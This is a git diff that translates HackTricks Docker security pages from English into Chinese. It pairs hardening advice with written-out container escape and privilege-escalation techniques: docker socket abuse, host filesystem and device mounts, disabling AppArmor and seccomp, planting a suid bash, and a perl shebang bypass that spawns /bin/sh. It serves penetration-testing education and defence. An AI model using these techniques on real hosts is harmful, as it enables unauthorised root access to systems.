+此配置允许在使用 Docker Compose 启动服务时使用秘密。 -This configuration allows for the use of secrets when starting services with Docker Compose. - -In Kubernetes environments, secrets are natively supported and can be further managed with tools like [Helm-Secrets](https://github.com/futuresimple/helm-secrets). Kubernetes' Role Based Access Controls (RBAC) enhances secret management security, similar to Docker Enterprise. +在 Kubernetes 环境中,秘密是原生支持的,并且可以通过像 [Helm-Secrets](https://github.com/futuresimple/helm-secrets) 这样的工具进一步管理。Kubernetes 的基于角色的访问控制 (RBAC) 增强了秘密管理的安全性,类似于 Docker Enterprise。 ### gVisor -**gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers. +**gVisor** 是一个应用内核,使用 Go 编写,实现了 Linux 系统表面的相当大一部分。它包括一个名为 `runsc` 的 [Open Container Initiative (OCI)](https://www.opencontainers.org) 运行时,提供了 **应用程序与主机内核之间的隔离边界**。`runsc` 运行时与 Docker 和 Kubernetes 集成,使得运行沙箱容器变得简单。 {% embed url="https://github.com/google/gvisor" %} ### Kata Containers -**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense. +**Kata Containers** 是一个开源社区,致力于构建一个安全的容器运行时,使用轻量级虚拟机,感觉和性能像容器,但提供 **使用硬件虚拟化技术作为第二道防线的更强工作负载隔离**。 {% embed url="https://katacontainers.io/" %} -### Summary Tips +### 总结提示 -- **Do not use the `--privileged` flag or mount a** [**Docker socket inside the container**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**.** The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag. -- Do **not run as root inside the container. Use a** [**different user**](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user) **and** [**user namespaces**](https://docs.docker.com/engine/security/userns-remap/)**.** The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups. -- [**Drop all capabilities**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`) and enable only those that are required** (`--cap-add=...`). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack. -- [**Use the “no-new-privileges” security option**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) to prevent processes from gaining more privileges, for example through suid binaries. -- [**Limit resources available to the container**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**.** Resource limits can protect the machine from denial of service attacks. -- **Adjust** [**seccomp**](https://docs.docker.com/engine/security/seccomp/)**,** [**AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(or SELinux)** profiles to restrict the actions and syscalls available for the container to the minimum required. -- **Use** [**official docker images**](https://docs.docker.com/docker-hub/official_images/) **and require signatures** or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. Also store root keys, passphrase in a safe place. Docker has plans to manage keys with UCP. -- **Regularly** **rebuild** your images to **apply security patches to the host an images.** -- Manage your **secrets wisely** so it's difficult to the attacker to access them. -- If you **exposes the docker daemon use HTTPS** with client & server authentication. -- In your Dockerfile, **favor COPY instead of ADD**. ADD automatically extracts zipped files and can copy files from URLs. COPY doesn’t have these capabilities. Whenever possible, avoid using ADD so you aren’t susceptible to attacks through remote URLs and Zip files. -- Have **separate containers for each micro-s**ervice -- **Don’t put ssh** inside container, “docker exec” can be used to ssh to Container. -- Have **smaller** container **images** +- **不要使用 `--privileged` 标志或在容器内挂载** [**Docker 套接字**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**。** Docker 套接字允许生成容器,因此这是完全控制主机的简单方法,例如,通过使用 `--privileged` 标志运行另一个容器。 +- **不要在容器内以 root 身份运行。使用** [**不同用户**](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user) **和** [**用户命名空间**](https://docs.docker.com/engine/security/userns-remap/)**。** 容器中的 root 与主机上的 root 是相同的,除非通过用户命名空间重新映射。它仅受到 Linux 命名空间、能力和 cgroups 的轻微限制。 +- [**丢弃所有能力**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`),仅启用所需的能力** (`--cap-add=...`)。许多工作负载不需要任何能力,添加它们会增加潜在攻击的范围。 +- [**使用“no-new-privileges”安全选项**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) 防止进程获得更多权限,例如通过 suid 二进制文件。 +- [**限制容器可用的资源**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**。** 资源限制可以保护机器免受拒绝服务攻击。 +- **调整** [**seccomp**](https://docs.docker.com/engine/security/seccomp/)**、** [**AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(或 SELinux)** 配置文件,以将容器可用的操作和系统调用限制到最低要求。 +- **使用** [**官方 Docker 镜像**](https://docs.docker.com/docker-hub/official_images/) **并要求签名**,或基于它们构建自己的镜像。不要继承或使用 [后门](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) 镜像。还要将 root 密钥、密码短语存放在安全的地方。Docker 计划通过 UCP 管理密钥。 +- **定期** **重建** 镜像以 **应用安全补丁到主机和镜像。** +- 明智地管理您的 **秘密**,使攻击者难以访问它们。 +- 如果您 **暴露 Docker 守护进程,请使用 HTTPS**,并进行客户端和服务器身份验证。 +- 在您的 Dockerfile 中,**优先使用 COPY 而不是 ADD**。ADD 会自动提取压缩文件,并可以从 URL 复制文件。COPY 没有这些功能。尽可能避免使用 ADD,以免受到通过远程 URL 和 Zip 文件的攻击。 +- 为每个微服务 **使用单独的容器** +- **不要在容器内放置 ssh**,可以使用 “docker exec” 连接到容器。 +- 拥有 **更小的** 容器 **镜像** -## Docker Breakout / Privilege Escalation +## Docker 突破 / 权限提升 -If you are **inside a docker container** or you have access to a user in the **docker group**, you could try to **escape and escalate privileges**: +如果您 **在 Docker 容器内** 或者您有权访问 **docker 组中的用户**,您可以尝试 **逃逸并提升权限**: {{#ref}} docker-breakout-privilege-escalation/ {{#endref}} -## Docker Authentication Plugin Bypass +## Docker 身份验证插件绕过 -If you have access to the docker socket or have access to a user in the **docker group but your actions are being limited by a docker auth plugin**, check if you can **bypass it:** +如果您可以访问 Docker 套接字或有权访问 **docker 组中的用户,但您的操作受到 Docker 身份验证插件的限制**,请检查您是否可以 **绕过它:** {{#ref}} authz-and-authn-docker-access-authorization-plugin.md {{#endref}} -## Hardening Docker +## 加固 Docker -- The tool [**docker-bench-security**](https://github.com/docker/docker-bench-security) is a script that checks for dozens of common best-practices around deploying Docker containers in production. The tests are all automated, and are based on the [CIS Docker Benchmark v1.3.1](https://www.cisecurity.org/benchmark/docker/).\ - You need to run the tool from the host running docker or from a container with enough privileges. Find out **how to run it in the README:** [**https://github.com/docker/docker-bench-security**](https://github.com/docker/docker-bench-security). +- 工具 [**docker-bench-security**](https://github.com/docker/docker-bench-security) 是一个脚本,检查在生产中部署 Docker 容器的数十个常见最佳实践。所有测试都是自动化的,基于 [CIS Docker 基准 v1.3.1](https://www.cisecurity.org/benchmark/docker/)。\ +您需要从运行 Docker 的主机或具有足够权限的容器中运行该工具。查找 **如何在 README 中运行它:** [**https://github.com/docker/docker-bench-security**](https://github.com/docker/docker-bench-security)。 -## References +## 参考 - [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) - [https://twitter.com/\_fel1x/status/1151487051986087936](https://twitter.com/_fel1x/status/1151487051986087936) @@ -421,12 +373,5 @@ authz-and-authn-docker-access-authorization-plugin.md - [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57) - [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/) -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md b/src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md index a23a6b769..927ce2f13 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md +++ b/src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md @@ -1,43 +1,43 @@ -# Abusing Docker Socket for Privilege Escalation +# 利用 Docker Socket 提升权限 {{#include ../../../banners/hacktricks-training.md}} -There are some occasions were you just have **access to the docker socket** and you want to use it to **escalate privileges**. Some actions might be very suspicious and you may want to avoid them, so here you can find different flags that can be useful to escalate privileges: +有些情况下你只拥有 **docker socket 的访问权限**,并且想要利用它来 **提升权限**。某些操作可能会非常可疑,你可能想要避免它们,因此在这里你可以找到一些有用的标志来提升权限: -### Via mount +### 通过挂载 -You can **mount** different parts of the **filesystem** in a container running as root and **access** them.\ -You could also **abuse a mount to escalate privileges** inside the container. +你可以在以 root 身份运行的容器中 **挂载** 文件系统的不同部分并 **访问** 它们。\ +你也可以 **利用挂载来提升容器内的权限**。 -- **`-v /:/host`** -> Mount the host filesystem in the container so you can **read the host filesystem.** - - If you want to **feel like you are in the host** but being on the container you could disable other defense mechanisms using flags like: - - `--privileged` - - `--cap-add=ALL` - - `--security-opt apparmor=unconfined` - - `--security-opt seccomp=unconfined` - - `-security-opt label:disable` - - `--pid=host` - - `--userns=host` - - `--uts=host` - - `--cgroupns=host` -- \*\*`--device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined` \*\* -> This is similar to the previous method, but here we are **mounting the device disk**. Then, inside the container run `mount /dev/sda1 /mnt` and you can **access** the **host filesystem** in `/mnt` - - Run `fdisk -l` in the host to find the `` device to mount -- **`-v /tmp:/host`** -> If for some reason you can **just mount some directory** from the host and you have access inside the host. Mount it and create a **`/bin/bash`** with **suid** in the mounted directory so you can **execute it from the host and escalate to root**. +- **`-v /:/host`** -> 在容器中挂载主机文件系统,以便你可以 **读取主机文件系统**。 +- 如果你想要 **感觉像是在主机上**,但实际上在容器中,你可以使用以下标志禁用其他防御机制: +- `--privileged` +- `--cap-add=ALL` +- `--security-opt apparmor=unconfined` +- `--security-opt seccomp=unconfined` +- `-security-opt label:disable` +- `--pid=host` +- `--userns=host` +- `--uts=host` +- `--cgroupns=host` +- \*\*`--device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined` \*\* -> 这与前面的方法类似,但这里我们是 **挂载设备磁盘**。然后,在容器内运行 `mount /dev/sda1 /mnt`,你可以在 `/mnt` 中 **访问** **主机文件系统**。 +- 在主机上运行 `fdisk -l` 找到要挂载的 `` 设备。 +- **`-v /tmp:/host`** -> 如果由于某种原因你只能 **挂载主机的某个目录**,并且你可以在主机内访问它。挂载它并在挂载目录中创建一个 **`/bin/bash`** 具有 **suid** 权限,以便你可以 **从主机执行它并提升到 root**。 > [!NOTE] -> Note that maybe you cannot mount the folder `/tmp` but you can mount a **different writable folder**. You can find writable directories using: `find / -writable -type d 2>/dev/null` +> 请注意,也许你无法挂载 `/tmp` 文件夹,但你可以挂载一个 **不同的可写文件夹**。你可以使用以下命令找到可写目录:`find / -writable -type d 2>/dev/null` > -> **Note that not all the directories in a linux machine will support the suid bit!** In order to check which directories support the suid bit run `mount | grep -v "nosuid"` For example usually `/dev/shm` , `/run` , `/proc` , `/sys/fs/cgroup` and `/var/lib/lxcfs` don't support the suid bit. +> **请注意,并非所有 Linux 机器上的目录都支持 suid 位!** 要检查哪些目录支持 suid 位,请运行 `mount | grep -v "nosuid"`。例如,通常 `/dev/shm`、`/run`、`/proc`、`/sys/fs/cgroup` 和 `/var/lib/lxcfs` 不支持 suid 位。 > -> Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`) +> 还要注意,如果你可以 **挂载 `/etc`** 或任何其他 **包含配置文件** 的文件夹,你可以在 docker 容器中以 root 身份更改它们,以便 **在主机中利用它们** 并提升权限(可能修改 `/etc/shadow`)。 -### Escaping from the container +### 从容器中逃逸 -- **`--privileged`** -> With this flag you [remove all the isolation from the container](docker-privileged.md#what-affects). Check techniques to [escape from privileged containers as root](docker-breakout-privilege-escalation/#automatic-enumeration-and-escape). -- **`--cap-add= [--security-opt apparmor=unconfined] [--security-opt seccomp=unconfined] [-security-opt label:disable]`** -> To [escalate abusing capabilities](../linux-capabilities.md), **grant that capability to the container** and disable other protection methods that may prevent the exploit to work. +- **`--privileged`** -> 使用此标志,你 [移除容器的所有隔离](docker-privileged.md#what-affects)。查看技术以 [以 root 身份从特权容器中逃逸](docker-breakout-privilege-escalation/#automatic-enumeration-and-escape)。 +- **`--cap-add= [--security-opt apparmor=unconfined] [--security-opt seccomp=unconfined] [-security-opt label:disable]`** -> 为了 [通过能力提升权限](../linux-capabilities.md),**将该能力授予容器** 并禁用可能阻止漏洞工作的其他保护方法。 ### Curl -In this page we have discussed ways to escalate privileges using docker flags, you can find **ways to abuse these methods using curl** command in the page: +在本页中,我们讨论了使用 docker 标志提升权限的方法,你可以在页面中找到 **使用 curl 命令滥用这些方法的方式**: {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/docker-security/apparmor.md b/src/linux-hardening/privilege-escalation/docker-security/apparmor.md index 0455067e0..990dfd159 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/apparmor.md +++ b/src/linux-hardening/privilege-escalation/docker-security/apparmor.md @@ -2,31 +2,30 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -AppArmor is a **kernel enhancement designed to restrict the resources available to programs through per-program profiles**, effectively implementing Mandatory Access Control (MAC) by tying access control attributes directly to programs instead of users. This system operates by **loading profiles into the kernel**, usually during boot, and these profiles dictate what resources a program can access, such as network connections, raw socket access, and file permissions. +AppArmor 是一个 **内核增强,旨在通过每个程序的配置文件限制程序可用的资源**,有效地通过将访问控制属性直接与程序而非用户绑定来实现强制访问控制 (MAC)。该系统通过 **将配置文件加载到内核中** 来运行,通常在启动时,这些配置文件规定了程序可以访问的资源,例如网络连接、原始套接字访问和文件权限。 -There are two operational modes for AppArmor profiles: +AppArmor 配置文件有两种操作模式: -- **Enforcement Mode**: This mode actively enforces the policies defined within the profile, blocking actions that violate these policies and logging any attempts to breach them through systems like syslog or auditd. -- **Complain Mode**: Unlike enforcement mode, complain mode does not block actions that go against the profile's policies. Instead, it logs these attempts as policy violations without enforcing restrictions. +- **强制模式**:此模式积极执行配置文件中定义的策略,阻止违反这些政策的操作,并通过 syslog 或 auditd 等系统记录任何试图违反的行为。 +- **投诉模式**:与强制模式不同,投诉模式不会阻止违反配置文件政策的操作。相反,它将这些尝试记录为政策违规,而不执行限制。 -### Components of AppArmor +### AppArmor 的组件 -- **Kernel Module**: Responsible for the enforcement of policies. -- **Policies**: Specify the rules and restrictions for program behavior and resource access. -- **Parser**: Loads policies into the kernel for enforcement or reporting. -- **Utilities**: These are user-mode programs that provide an interface for interacting with and managing AppArmor. +- **内核模块**:负责政策的执行。 +- **政策**:指定程序行为和资源访问的规则和限制。 +- **解析器**:将政策加载到内核中以进行执行或报告。 +- **实用程序**:这些是用户模式程序,提供与 AppArmor 交互和管理的接口。 -### Profiles path +### 配置文件路径 -Apparmor profiles are usually saved in _**/etc/apparmor.d/**_\ -With `sudo aa-status` you will be able to list the binaries that are restricted by some profile. If you can change the char "/" for a dot of the path of each listed binary and you will obtain the name of the apparmor profile inside the mentioned folder. +Apparmor 配置文件通常保存在 _**/etc/apparmor.d/**_\ +使用 `sudo aa-status`,您将能够列出受某些配置文件限制的二进制文件。如果您将每个列出二进制文件路径中的字符 "/" 更改为点,您将获得提到的文件夹内的 apparmor 配置文件名称。 -For example, a **apparmor** profile for _/usr/bin/man_ will be located in _/etc/apparmor.d/usr.bin.man_ - -### Commands +例如,**apparmor** 配置文件对于 _/usr/bin/man_ 将位于 _/etc/apparmor.d/usr.bin.man_ +### 命令 ```bash aa-status #check the current status aa-enforce #set profile to enforce mode (from disable or complain) @@ -36,47 +35,41 @@ aa-genprof #generate a new profile aa-logprof #used to change the policy when the binary/program is changed aa-mergeprof #used to merge the policies ``` +## 创建配置文件 -## Creating a profile - -- In order to indicate the affected executable, **absolute paths and wildcards** are allowed (for file globbing) for specifying files. -- To indicate the access the binary will have over **files** the following **access controls** can be used: - - **r** (read) - - **w** (write) - - **m** (memory map as executable) - - **k** (file locking) - - **l** (creation hard links) - - **ix** (to execute another program with the new program inheriting policy) - - **Px** (execute under another profile, after cleaning the environment) - - **Cx** (execute under a child profile, after cleaning the environment) - - **Ux** (execute unconfined, after cleaning the environment) -- **Variables** can be defined in the profiles and can be manipulated from outside the profile. For example: @{PROC} and @{HOME} (add #include \ to the profile file) -- **Deny rules are supported to override allow rules**. +- 为了指示受影响的可执行文件,**绝对路径和通配符**被允许用于指定文件。 +- 要指示二进制文件对**文件**的访问,可以使用以下**访问控制**: +- **r** (读取) +- **w** (写入) +- **m** (将内存映射为可执行) +- **k** (文件锁定) +- **l** (创建硬链接) +- **ix** (执行另一个程序,新程序继承策略) +- **Px** (在另一个配置文件下执行,清理环境后) +- **Cx** (在子配置文件下执行,清理环境后) +- **Ux** (在无约束下执行,清理环境后) +- **变量**可以在配置文件中定义,并可以从配置文件外部进行操作。例如:@{PROC} 和 @{HOME} (将 #include \ 添加到配置文件) +- **支持拒绝规则以覆盖允许规则**。 ### aa-genprof -To easily start creating a profile apparmor can help you. It's possible to make **apparmor inspect the actions performed by a binary and then let you decide which actions you want to allow or deny**.\ -You just need to run: - +要轻松开始创建配置文件,apparmor 可以帮助您。可以让**apparmor 检查二进制文件执行的操作,然后让您决定要允许或拒绝哪些操作**。\ +您只需运行: ```bash sudo aa-genprof /path/to/binary ``` - -Then, in a different console perform all the actions that the binary will usually perform: - +然后,在另一个控制台中执行二进制文件通常会执行的所有操作: ```bash /path/to/binary -a dosomething ``` - -Then, in the first console press "**s**" and then in the recorded actions indicate if you want to ignore, allow, or whatever. When you have finished press "**f**" and the new profile will be created in _/etc/apparmor.d/path.to.binary_ +然后,在第一个控制台中按“**s**”,然后在记录的操作中指示您想要忽略、允许或其他。当您完成后按“**f**”,新配置文件将创建在 _/etc/apparmor.d/path.to.binary_ > [!NOTE] -> Using the arrow keys you can select what you want to allow/deny/whatever +> 使用箭头键可以选择您想要允许/拒绝/其他的内容 ### aa-easyprof -You can also create a template of an apparmor profile of a binary with: - +您还可以使用以下命令创建二进制文件的 apparmor 配置文件模板: ```bash sudo aa-easyprof /path/to/binary # vim:syntax=apparmor @@ -90,40 +83,34 @@ sudo aa-easyprof /path/to/binary # No template variables specified "/path/to/binary" { - #include +#include - # No abstractions specified +# No abstractions specified - # No policy groups specified +# No policy groups specified - # No read paths specified +# No read paths specified - # No write paths specified +# No write paths specified } ``` - > [!NOTE] -> Note that by default in a created profile nothing is allowed, so everything is denied. You will need to add lines like `/etc/passwd r,` to allow the binary read `/etc/passwd` for example. - -You can then **enforce** the new profile with +> 请注意,在创建的配置文件中,默认情况下不允许任何操作,因此所有操作都被拒绝。您需要添加类似 `/etc/passwd r,` 的行,以允许二进制文件读取 `/etc/passwd`,例如。 +您可以然后 **enforce** 新的配置文件,使用 ```bash sudo apparmor_parser -a /etc/apparmor.d/path.to.binary ``` +### 从日志修改配置文件 -### Modifying a profile from logs - -The following tool will read the logs and ask the user if he wants to permit some of the detected forbidden actions: - +以下工具将读取日志并询问用户是否要允许某些检测到的禁止操作: ```bash sudo aa-logprof ``` - > [!NOTE] -> Using the arrow keys you can select what you want to allow/deny/whatever - -### Managing a Profile +> 使用箭头键可以选择您想要允许/拒绝/其他的内容 +### 管理配置文件 ```bash #Main profile management commands apparmor_parser -a /etc/apparmor.d/profile.name #Load a new profile in enforce mode @@ -131,18 +118,14 @@ apparmor_parser -C /etc/apparmor.d/profile.name #Load a new profile in complain apparmor_parser -r /etc/apparmor.d/profile.name #Replace existing profile apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile ``` +## 日志 -## Logs - -Example of **AUDIT** and **DENIED** logs from _/var/log/audit/audit.log_ of the executable **`service_bin`**: - +示例 **AUDIT** 和 **DENIED** 日志来自 _/var/log/audit/audit.log_ 的可执行文件 **`service_bin`**: ```bash type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000 type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 ``` - -You can also get this information using: - +您还可以使用以下方法获取此信息: ```bash sudo aa-notify -s 1 -v Profile: /bin/service_bin @@ -160,126 +143,104 @@ Logfile: /var/log/audit/audit.log AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021) For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor ``` - ## Apparmor in Docker -Note how the profile **docker-profile** of docker is loaded by default: - +注意 **docker-profile** 的配置文件是默认加载的: ```bash sudo aa-status apparmor module is loaded. 50 profiles are loaded. 13 profiles are in enforce mode. - /sbin/dhclient - /usr/bin/lxc-start - /usr/lib/NetworkManager/nm-dhcp-client.action - /usr/lib/NetworkManager/nm-dhcp-helper - /usr/lib/chromium-browser/chromium-browser//browser_java - /usr/lib/chromium-browser/chromium-browser//browser_openjdk - /usr/lib/chromium-browser/chromium-browser//sanitized_helper - /usr/lib/connman/scripts/dhclient-script - docker-default +/sbin/dhclient +/usr/bin/lxc-start +/usr/lib/NetworkManager/nm-dhcp-client.action +/usr/lib/NetworkManager/nm-dhcp-helper +/usr/lib/chromium-browser/chromium-browser//browser_java +/usr/lib/chromium-browser/chromium-browser//browser_openjdk +/usr/lib/chromium-browser/chromium-browser//sanitized_helper +/usr/lib/connman/scripts/dhclient-script +docker-default ``` +默认情况下,**Apparmor docker-default 配置文件**是从 [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) 生成的。 -By default **Apparmor docker-default profile** is generated from [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) +**docker-default 配置文件摘要**: -**docker-default profile Summary**: - -- **Access** to all **networking** -- **No capability** is defined (However, some capabilities will come from including basic base rules i.e. #include \ ) -- **Writing** to any **/proc** file is **not allowed** -- Other **subdirectories**/**files** of /**proc** and /**sys** are **denied** read/write/lock/link/execute access -- **Mount** is **not allowed** -- **Ptrace** can only be run on a process that is confined by **same apparmor profile** - -Once you **run a docker container** you should see the following output: +- **访问**所有**网络** +- **未定义能力**(但是,一些能力将来自包含基本基础规则,即 #include \) +- **写入**任何**/proc** 文件**不允许** +- 其他**/proc**和**/sys**的**子目录**/**文件**被**拒绝**读/写/锁/链接/执行访问 +- **挂载****不允许** +- **Ptrace**只能在被**相同 apparmor 配置文件**限制的进程上运行 +一旦你**运行一个 docker 容器**,你应该看到以下输出: ```bash 1 processes are in enforce mode. - docker-default (825) +docker-default (825) ``` - -Note that **apparmor will even block capabilities privileges** granted to the container by default. For example, it will be able to **block permission to write inside /proc even if the SYS_ADMIN capability is granted** because by default docker apparmor profile denies this access: - +注意,**apparmor 甚至会阻止默认情况下授予容器的能力特权**。例如,它将能够**阻止写入 /proc 的权限,即使授予了 SYS_ADMIN 能力**,因为默认情况下 docker apparmor 配置文件拒绝此访问: ```bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash echo "" > /proc/stat sh: 1: cannot create /proc/stat: Permission denied ``` - -You need to **disable apparmor** to bypass its restrictions: - +您需要**禁用 apparmor**以绕过其限制: ```bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash ``` +请注意,默认情况下,**AppArmor** 还会 **禁止容器从内部挂载** 文件夹,即使具有 SYS_ADMIN 能力。 -Note that by default **AppArmor** will also **forbid the container to mount** folders from the inside even with SYS_ADMIN capability. +请注意,您可以 **添加/删除** **能力** 到 docker 容器(这仍然会受到 **AppArmor** 和 **Seccomp** 等保护方法的限制): -Note that you can **add/remove** **capabilities** to the docker container (this will be still restricted by protection methods like **AppArmor** and **Seccomp**): - -- `--cap-add=SYS_ADMIN` give `SYS_ADMIN` cap -- `--cap-add=ALL` give all caps -- `--cap-drop=ALL --cap-add=SYS_PTRACE` drop all caps and only give `SYS_PTRACE` +- `--cap-add=SYS_ADMIN` 给予 `SYS_ADMIN` 能力 +- `--cap-add=ALL` 给予所有能力 +- `--cap-drop=ALL --cap-add=SYS_PTRACE` 删除所有能力,仅给予 `SYS_PTRACE` > [!NOTE] -> Usually, when you **find** that you have a **privileged capability** available **inside** a **docker** container **but** some part of the **exploit isn't working**, this will be because docker **apparmor will be preventing it**. +> 通常,当您 **发现** 在 **docker** 容器 **内部** 有一个 **特权能力** 可用 **但** 某些部分的 **利用没有工作** 时,这将是因为 docker **apparmor 会阻止它**。 -### Example +### 示例 -(Example from [**here**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/)) - -To illustrate AppArmor functionality, I created a new Docker profile “mydocker” with the following line added: +(示例来自 [**这里**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/)) +为了说明 AppArmor 的功能,我创建了一个新的 Docker 配置文件 “mydocker”,并添加了以下行: ``` deny /etc/* w, # deny write for all files directly in /etc (not in a subdir) ``` - -To activate the profile, we need to do the following: - +要激活配置文件,我们需要执行以下操作: ``` sudo apparmor_parser -r -W mydocker ``` - -To list the profiles, we can do the following command. The command below is listing my new AppArmor profile. - +要列出配置文件,我们可以执行以下命令。下面的命令列出了我新的 AppArmor 配置文件。 ``` $ sudo apparmor_status | grep mydocker - mydocker +mydocker ``` - -As shown below, we get error when trying to change “/etc/” since AppArmor profile is preventing write access to “/etc”. - +如下面所示,当尝试更改“/etc/”时,我们会遇到错误,因为 AppArmor 配置文件阻止对“/etc”的写入访问。 ``` $ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname chmod: /etc/hostname: Permission denied ``` - ### AppArmor Docker Bypass1 -You can find which **apparmor profile is running a container** using: - +您可以使用以下命令找到**正在运行容器的 apparmor 配置文件**: ```bash docker inspect 9d622d73a614 | grep lowpriv - "AppArmorProfile": "lowpriv", - "apparmor=lowpriv" +"AppArmorProfile": "lowpriv", +"apparmor=lowpriv" ``` - -Then, you can run the following line to **find the exact profile being used**: - +然后,您可以运行以下命令来**查找正在使用的确切配置文件**: ```bash find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null ``` - -In the weird case you can **modify the apparmor docker profile and reload it.** You could remove the restrictions and "bypass" them. +在奇怪的情况下,你可以**修改 apparmor docker 配置文件并重新加载它。** 你可以删除限制并“绕过”它们。 ### AppArmor Docker Bypass2 -**AppArmor is path based**, this means that even if it might be **protecting** files inside a directory like **`/proc`** if you can **configure how the container is going to be run**, you could **mount** the proc directory of the host inside **`/host/proc`** and it **won't be protected by AppArmor anymore**. +**AppArmor 是基于路径的,** 这意味着即使它可能在保护像 **`/proc`** 这样的目录中的文件,如果你可以**配置容器的运行方式,** 你可以**挂载**主机的 proc 目录到 **`/host/proc`**,并且它**将不再受到 AppArmor 的保护**。 ### AppArmor Shebang Bypass -In [**this bug**](https://bugs.launchpad.net/apparmor/+bug/1911431) you can see an example of how **even if you are preventing perl to be run with certain resources**, if you just create a a shell script **specifying** in the first line **`#!/usr/bin/perl`** and you **execute the file directly**, you will be able to execute whatever you want. E.g.: - +在 [**这个漏洞**](https://bugs.launchpad.net/apparmor/+bug/1911431) 中,你可以看到一个例子,说明**即使你正在防止 perl 使用某些资源运行,** 如果你只需创建一个 shell 脚本**在第一行指定** **`#!/usr/bin/perl`** 并且你**直接执行该文件,** 你将能够执行你想要的任何内容。例如: ```perl echo '#!/usr/bin/perl use POSIX qw(strftime); @@ -289,5 +250,4 @@ exec "/bin/sh"' > /tmp/test.pl chmod +x /tmp/test.pl /tmp/test.pl ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md b/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md index 3cef5bc8e..2051939f6 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md +++ b/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md @@ -1,75 +1,70 @@ {{#include ../../../banners/hacktricks-training.md}} -**Docker’s** out-of-the-box **authorization** model is **all or nothing**. Any user with permission to access the Docker daemon can **run any** Docker client **command**. The same is true for callers using Docker’s Engine API to contact the daemon. If you require **greater access control**, you can create **authorization plugins** and add them to your Docker daemon configuration. Using an authorization plugin, a Docker administrator can **configure granular access** policies for managing access to the Docker daemon. +**Docker** 的开箱即用 **授权** 模型是 **全有或全无**。任何有权限访问 Docker 守护进程的用户都可以 